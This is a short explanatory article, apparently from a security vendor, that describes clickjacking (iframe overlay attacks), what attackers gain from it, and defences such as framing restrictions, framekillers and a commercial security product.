What is Clickjacking?

Clickjacking is when a cybercriminal tricks a user into clicking a link that seemingly takes them one place but instead routs them to the attacker’s chosen destination most often for malicious purposes. Clickjacking is also known as redressing or IFRAME overlay. In many cases, the user may not realize that their clicks aren't going where they're supposed to, which can open up a number of vulnerabilities.

The hacker has several ways they can use the redirected clicks for their own gain. A common form of clickjacking involves mirroring a login and password form on a website. The user assumes that they're entering their information into a usual form but they're actually entering it in fields the hacker has overlaid on the UI. Hackers will target passwords, credit card numbers and any other valuable data they can exploit.

An attacker may also choose to redirect the clicks to download malware or gain access to vital systems as a starting point for an advanced persistent threat (APT). This spells trouble for any organizations that rely on protecting sensitive data and intellectual property.

Links can be hidden under media and trigger a particular action, such as liking a Facebook page or ordering a product on Amazon. The user may need to meet certain conditions for the attack to actually be successful, such as staying logged into social media accounts.

If the user gets tricked into downloading something on their computer, then they have to deal with a compromised computer. In the best case scenario, they can get rid of the malware through an anti-virus scan. In the worst case, they would need to reformat their computer and reinstall the operating system.

Clickjacking can turn system features on and off, such as enabling your microphone and camera when a Javascript prompt asks for permission to access this information. It could also pull location data from your computer or other details that could facilitate future crimes.

Thankfully, you have several methods that prevent clickjacking before the users are in danger.

• Prevent framing from other domains: Stop a hacker from putting an invisible overlay on your popular content. The only way that your page can get served in a frame with this configuration is if it's the same domain as the website.
• Moving the current frame to the top: This type of code ensures that the currently active frame is the one on the top, which makes it difficult to overlay the UI with hidden elements.
• Client-side anti-clickjacking add-ons: Some web browsers, such as Firefox, have add-ons that stop scripts from running on a webpage. This approach prevents the hacker from being able to execute the script.
• Add a framekiller to the website: Javascript has a framekiller function that stops pages from being pulled into an iFrame.
• Use a robust cybersecurity solution: A comprehensive cybersecurity solution, such as Forcepoint, considers multiple attack vectors when securing your website and systems from hackers.

Clickjacking is an intrusive and damaging attack method that can lead to many serious consequences. Your company needs a way to proactively stop this attack from turning your website or content into a dangerous environment for users.